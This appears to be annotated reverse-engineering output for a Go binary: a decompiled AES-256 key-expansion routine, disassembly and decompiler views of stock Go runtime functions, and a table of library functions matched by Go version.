void _expand_key_256b(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,uint32_t param_5,
undefined8 param_6,uint32_t *param_7)
{
uint32_t in_XMM1_Dc;
uint32_t uVar1;
uint32_t uVar2;
uint32_t in_XMM2_Dc;
uint32_t uVar3;
uint32_t in_XMM2_Dd;
uVar2 = param_3 >> 0x20;
uVar1 = param_3;
uVar3 = in_XMM2_Dc ^ uVar2;
*param_7 = uVar1 ^ in_XMM1_Dc;
param_7[1] = uVar2 ^ param_5 ^ uVar1 ^ in_XMM1_Dc;
param_7[2] = uVar3 ^ uVar1 ^ param_5 ^ in_XMM1_Dc;
param_7[3] = in_XMM2_Dd ^ uVar1 ^ uVar3 ^ in_XMM1_Dc;
return;
}
0x4024A0 0 str 0 api 0 imm 3 Unknown
; internal.bytealg.init.0: standard-library initialiser that sets the qword at
; 0x5A2358 to 0x3F when the flag byte at 0x5A2AC3 is non-zero and to 0x1F
; otherwise. Presumably a CPU-feature-dependent length limit -- confirm.
internal.bytealg.init.0() {
cmp byte ptr [0x5A2AC3], 0x00
jz .1
mov qword ptr [0x5A2358], 0x3F ; flag set: 63
jmp .2
.1:
mov qword ptr [0x5A2358], 0x1F ; flag clear: 31
.2:
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of internal.bytealg.init.0: picks 0x3f or 0x1f for the
 * global at 0x5a2358 depending on the flag byte at 0x5a2ac3.
 */
void internal.bytealg.init.0(void)
{
if ([0x0x5a2ac3] == '\0') {
[0x0x5a2358] = 0x1f;
}
else {
[0x0x5a2358] = 0x3f;
}
return;
}
0x405200 chansend1 str 0 api 0 imm 3 Unknown
; runtime.chansend1: thin Go runtime wrapper around runtime.chansend.
; rax and rbx are passed through unchanged, rcx is set to 1 and rdi to this
; function's own return address. Stock runtime code.
runtime.chansend1() {
sub rsp, 0x28
mov [rsp+0x20], rbp
lea rbp, [rsp+0x20]
mov ecx, 0x01 ; third argument = 1; presumably the "block" flag -- confirm
mov rdi, [rsp+0x28] ; fourth argument = return address of chansend1
call runtime.chansend()
mov rbp, [rsp+0x20]
add rsp, 0x28
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.chansend1: forwards its two arguments to
 * runtime.chansend with a constant 1 and the caller's return address.
 */
void runtime.chansend1(undefined8 param_1,undefined8 param_2)
{
undefined8 unaff_retaddr;
runtime.chansend(param_1, param_2, 1, unaff_retaddr);
return;
}
0x405F60 chanrecv1 str 0 api 0 imm 3 Unknown
; runtime.chanrecv1: thin Go runtime wrapper around runtime.chanrecv.
; rax and rbx are passed through unchanged and rcx is set to 1. Stock runtime code.
runtime.chanrecv1() {
sub rsp, 0x20
mov [rsp+0x18], rbp
lea rbp, [rsp+0x18]
mov ecx, 0x01 ; third argument = 1; presumably the "block" flag -- confirm
call runtime.chanrecv()
mov rbp, [rsp+0x18]
add rsp, 0x20
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.chanrecv1: forwards its two arguments to
 * runtime.chanrecv with a constant 1 as the third argument.
 */
void runtime.chanrecv1(undefined8 param_1,undefined8 param_2)
{
runtime.chanrecv(param_1, param_2, 1);
return;
}
| Library | Functions |
|---|---|
| golang-1.20 | 854 |
| golang-1.19 | 389 |
| golang-1.18 | 315 |
| runtime/other | 290 |
| golang-1.17 | 221 |
| golang-1.21 | 22 |
| golang-1.22 | 18 |
| golang-1.23 | 17 |
| golang-1.24 | 13 |
| golang-1.25 | 12 |
| golang-1.16 | 2 |
| golang-1.14 | 1 |
| golang-1.15 | 1 |